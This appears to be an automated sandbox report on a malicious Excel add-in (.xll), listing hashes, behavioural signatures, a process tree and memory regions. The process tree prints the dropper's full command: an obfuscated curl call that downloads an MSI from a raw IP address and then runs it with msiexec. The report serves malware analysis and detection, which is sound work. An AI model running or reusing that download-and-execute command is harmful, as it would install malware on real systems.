Analysis

  • max time kernel
    141s
  • max time network
    148s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230915-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20230915-enlocale:en-usos:windows10-2004-x64system
  • submitted
    11/10/2023, 11:19

General

  • Target

    768f003f97b5735f658a712f88c21d9747f6c6465d8157c153f14fbaa2e9c9aa_JC.xll

  • Size

    12KB

  • MD5

    398624261835a9df069e100979c7b72c

  • SHA1

    070921b48ced543e571127c2243088675a7c7349

  • SHA256

    768f003f97b5735f658a712f88c21d9747f6c6465d8157c153f14fbaa2e9c9aa

  • SHA512

    5e9f62a8466acdf450e03c3cb7641e24ea5027d397d86c81d182bce94bc4e57368e92618ecc24108cb224cabf24b4afc95f01f766c8feb9319c0b9c2f19a6761

  • SSDEEP

    192:uU5z9iLjq2pJk+/qcJklyJOEdtLsWGQwrgAh:3z9AbJH/IwJOsW/QwrgC

Score
10/10

Malware Config

Extracted

Language
xlm4.0
Source

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Modifies registry class 1 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of FindShellTrayWindow 4 IoCs
  • Suspicious use of SetWindowsHookEx 12 IoCs
  • Suspicious use of WriteProcessMemory 8 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\768f003f97b5735f658a712f88c21d9747f6c6465d8157c153f14fbaa2e9c9aa_JC.xll"
    1⤵
    • Loads dropped DLL
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2288
    • \??\c:\windows\system32\cmd.exe
      c:\windows\system32\cmd.exe /c c^url -o c:\users\public\1.msi http://51.195.49.233/dGp9oe/rAoeU0&&timeout 10&&c:\users\public\1.msi
      2⤵
      • Process spawned unexpected child process
      • Checks computer location settings
      • Modifies registry class
      • Suspicious use of WriteProcessMemory
      PID:2628
      • C:\Windows\system32\curl.exe
        curl -o c:\users\public\1.msi http://51.195.49.233/dGp9oe/rAoeU0
        3⤵
          PID:2892
        • C:\Windows\system32\timeout.exe
          timeout 10
          3⤵
          • Delays execution with timeout.exe
          PID:4884
        • C:\Windows\System32\msiexec.exe
          "C:\Windows\System32\msiexec.exe" /i "C:\users\public\1.msi"
          3⤵
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of FindShellTrayWindow
          PID:4112

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\768f003f97b5735f658a712f88c21d9747f6c6465d8157c153f14fbaa2e9c9aa_JC.xll

      Filesize

      12KB

      MD5

      398624261835a9df069e100979c7b72c

      SHA1

      070921b48ced543e571127c2243088675a7c7349

      SHA256

      768f003f97b5735f658a712f88c21d9747f6c6465d8157c153f14fbaa2e9c9aa

      SHA512

      5e9f62a8466acdf450e03c3cb7641e24ea5027d397d86c81d182bce94bc4e57368e92618ecc24108cb224cabf24b4afc95f01f766c8feb9319c0b9c2f19a6761

    • C:\Users\Admin\AppData\Local\Temp\768f003f97b5735f658a712f88c21d9747f6c6465d8157c153f14fbaa2e9c9aa_JC.xll

      Filesize

      12KB

      MD5

      398624261835a9df069e100979c7b72c

      SHA1

      070921b48ced543e571127c2243088675a7c7349

      SHA256

      768f003f97b5735f658a712f88c21d9747f6c6465d8157c153f14fbaa2e9c9aa

      SHA512

      5e9f62a8466acdf450e03c3cb7641e24ea5027d397d86c81d182bce94bc4e57368e92618ecc24108cb224cabf24b4afc95f01f766c8feb9319c0b9c2f19a6761

    • memory/2288-16-0x00007FFE212A0000-0x00007FFE212B0000-memory.dmp

      Filesize

      64KB

    • memory/2288-18-0x00007FFE63630000-0x00007FFE63825000-memory.dmp

      Filesize

      2.0MB

    • memory/2288-4-0x00007FFE236B0000-0x00007FFE236C0000-memory.dmp

      Filesize

      64KB

    • memory/2288-6-0x00007FFE63630000-0x00007FFE63825000-memory.dmp

      Filesize

      2.0MB

    • memory/2288-5-0x00007FFE63630000-0x00007FFE63825000-memory.dmp

      Filesize

      2.0MB

    • memory/2288-7-0x00007FFE236B0000-0x00007FFE236C0000-memory.dmp

      Filesize

      64KB

    • memory/2288-8-0x00007FFE236B0000-0x00007FFE236C0000-memory.dmp

      Filesize

      64KB

    • memory/2288-9-0x00007FFE63630000-0x00007FFE63825000-memory.dmp

      Filesize

      2.0MB

    • memory/2288-10-0x00007FFE63630000-0x00007FFE63825000-memory.dmp

      Filesize

      2.0MB

    • memory/2288-11-0x00007FFE63630000-0x00007FFE63825000-memory.dmp

      Filesize

      2.0MB

    • memory/2288-12-0x00007FFE212A0000-0x00007FFE212B0000-memory.dmp

      Filesize

      64KB

    • memory/2288-13-0x00007FFE63630000-0x00007FFE63825000-memory.dmp

      Filesize

      2.0MB

    • memory/2288-14-0x00007FFE63630000-0x00007FFE63825000-memory.dmp

      Filesize

      2.0MB

    • memory/2288-15-0x00007FFE63630000-0x00007FFE63825000-memory.dmp

      Filesize

      2.0MB

    • memory/2288-2-0x00007FFE236B0000-0x00007FFE236C0000-memory.dmp

      Filesize

      64KB

    • memory/2288-0-0x00007FFE236B0000-0x00007FFE236C0000-memory.dmp

      Filesize

      64KB

    • memory/2288-19-0x00007FFE63630000-0x00007FFE63825000-memory.dmp

      Filesize

      2.0MB

    • memory/2288-20-0x00007FFE63630000-0x00007FFE63825000-memory.dmp

      Filesize

      2.0MB

    • memory/2288-17-0x00007FFE63630000-0x00007FFE63825000-memory.dmp

      Filesize

      2.0MB

    • memory/2288-21-0x00007FFE63630000-0x00007FFE63825000-memory.dmp

      Filesize

      2.0MB

    • memory/2288-3-0x00007FFE63630000-0x00007FFE63825000-memory.dmp

      Filesize

      2.0MB

    • memory/2288-1-0x00007FFE63630000-0x00007FFE63825000-memory.dmp

      Filesize

      2.0MB

    • memory/2288-25-0x00007FFE63630000-0x00007FFE63825000-memory.dmp

      Filesize

      2.0MB

    • memory/2288-42-0x00007FFE236B0000-0x00007FFE236C0000-memory.dmp

      Filesize

      64KB

    • memory/2288-43-0x00007FFE236B0000-0x00007FFE236C0000-memory.dmp

      Filesize

      64KB

    • memory/2288-44-0x00007FFE236B0000-0x00007FFE236C0000-memory.dmp

      Filesize

      64KB

    • memory/2288-45-0x00007FFE63630000-0x00007FFE63825000-memory.dmp

      Filesize

      2.0MB

    • memory/2288-47-0x00007FFE63630000-0x00007FFE63825000-memory.dmp

      Filesize

      2.0MB

    • memory/2288-46-0x00007FFE236B0000-0x00007FFE236C0000-memory.dmp

      Filesize

      64KB

    • memory/2288-48-0x00007FFE63630000-0x00007FFE63825000-memory.dmp

      Filesize

      2.0MB

    • memory/2288-49-0x00007FFE63630000-0x00007FFE63825000-memory.dmp

      Filesize

      2.0MB